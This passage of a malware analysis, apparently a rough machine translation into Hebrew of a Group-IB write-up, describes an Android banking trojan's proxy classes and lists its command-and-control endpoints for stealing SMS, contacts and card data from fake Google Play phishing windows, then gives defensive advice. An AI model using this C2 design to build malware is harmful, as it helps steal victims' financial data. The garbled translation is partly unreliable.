• שני כיתות לוקחות חלק ב-proxying: ProxyConnection и סוף. בעת יצירת כיתה ProxyConnection מתחבר לכתובת ProxyConfigClass.host: ProxyConfigClass.proxyPort והעברת אובייקט JSON:

 {
    "id":<%connectionId%>
}

בתגובה, השרת שולח הודעת SOCKS5 המכילה את כתובת השרת המרוחק איתו יש ליצור את החיבור. אינטראקציה עם שרת זה מתרחשת דרך המחלקה סוף. ניתן לייצג את הגדרת החיבור באופן סכמטי באופן הבא:

אינטראקציות ברשת

כדי למנוע ניתוח תעבורה על ידי סניפרים ברשת, ניתן להגן על האינטראקציה בין שרת ה-CnC והאפליקציה באמצעות פרוטוקול SSL. כל הנתונים המועברים הן מהשרת והן אליו מוצגים בפורמט JSON. האפליקציה מבצעת את הבקשות הבאות במהלך הפעולה:

• http://<%CnC%>/api/v1/set_state.php - התוצאה של ביצוע הפקודה.
• http://<%CnC%>/api/v1/get.php - קבלת פקודה.
• http://<%CnC%>/api/v1/load_sms.php — הורדת הודעות SMS ממכשיר נגוע.
• http://<%CnC%>/api/v1/load_ab.php - העלאת רשימה של אנשי קשר ממכשיר נגוע.
• http://<%CnC%>/api/v1/aevents.php – הבקשה מתבצעת בעת עדכון פרמטרים הנמצאים בקובץ ההעדפות.
• http://<%CnC%>/api/v1/set_card.php - העלאת נתונים שהושגו באמצעות חלון דיוג המתחזה ל-Google Play Market.
• http://<%CnC%>/api/v1/logs.php - העלאת נתוני יומן.
• http://<%CnC%>/api/v1/records.php - העלאת נתונים שהתקבלו דרך חלונות דיוג.
• http://<%CnC%>/api/v1/set_error.php - הודעה על שגיאה שהתרחשה.

המלצות

על מנת להגן על לקוחותיהן מפני האיום של סוסים טרויאניים ניידים, חברות חייבות להשתמש בפתרונות מקיפים המאפשרים להן לנטר ולמנוע פעילות זדונית מבלי להתקין תוכנה נוספת במכשירי המשתמש.

לשם כך, יש לחזק את שיטות החתימה לזיהוי סוסים טרויאניים ניידים בטכנולוגיות לניתוח התנהגות הלקוח והאפליקציה עצמה. ההגנה צריכה לכלול גם פונקציית זיהוי מכשיר בטכנולוגיית טביעת אצבע דיגיטלית, שתאפשר להבין מתי נעשה שימוש בחשבון ממכשיר לא טיפוסי וכבר נפל לידיו של רמאי.

נקודה חשובה ביסודה היא הזמינות של ניתוח חוצה-ערוצים, המאפשר לחברות לשלוט בסיכונים הנובעים לא רק באינטרנט, אלא גם בערוץ הנייד, למשל, ביישומים לבנקאות סלולרית, עבור עסקאות עם מטבעות קריפטוגרפיים וכל מקום אחר. ניתן לבצע עסקאות.עסקה פיננסית.

כללי בטיחות למשתמשים:

• אל תתקין אפליקציות למכשיר נייד עם מערכת הפעלה אנדרואיד מכל מקורות אחרים מלבד Google Play, שימו לב במיוחד לזכויות המבוקשות על ידי האפליקציה;
• התקן באופן קבוע עדכוני מערכת הפעלה אנדרואיד;
• שימו לב להרחבות של קבצים שהורדו;
• אל תבקר במשאבים חשודים;
• אין ללחוץ על קישורים שהתקבלו בהודעות SMS.

מככב סמיון רוגאצ'בה, מומחה זוטר בחקר תוכנות זדוניות במעבדה לזיהוי פלילי מחשבים Group-IB.

מקור: www.habr.com